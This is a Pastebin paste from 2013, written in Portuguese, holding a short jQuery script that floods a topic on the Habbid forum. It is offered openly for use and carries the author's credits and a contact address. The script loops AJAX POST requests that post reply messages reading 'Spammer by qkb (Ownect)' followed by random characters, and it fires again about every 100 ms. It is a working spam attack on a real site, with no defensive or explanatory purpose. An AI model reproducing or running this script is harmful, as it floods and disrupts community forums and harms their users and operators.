Advertisement
Le-Ownect

JS Floodar em tópicos da habbid

Aug 15th, 2013
188
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* Vá até o tópico que quiser floodar da Habbid e execute esse javascript (Uma mensagem por segundo).
  2. Javascript feito por phoenix (vidaroo) se for usar ou postar ao menos deixe créditos ;)
  3. contato: phnx_wc@hotmail.com */
  4. function _r() {
  5.     var i, chars = '1234567890abced',
  6.         str = '';
  7.     for (i = 0; i < 100; i++) {
  8.         str += chars.substr((Math.floor(Math.random() * (chars.length + 1))), 1);
  9.     };
  10.     return str;
  11. };
  12.  
  13. function flood() {
  14.     $.ajax({
  15.         type: "POST",
  16.         url: location.pathname,
  17.         data: "acao=responderTopico&mensagem=Spammer by qkb (Ownect) " + _r(),
  18.         success: function () {
  19.             setTimeout("flood()", 100);
  20.         }
  21.     });
  22. };
  23. flood();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement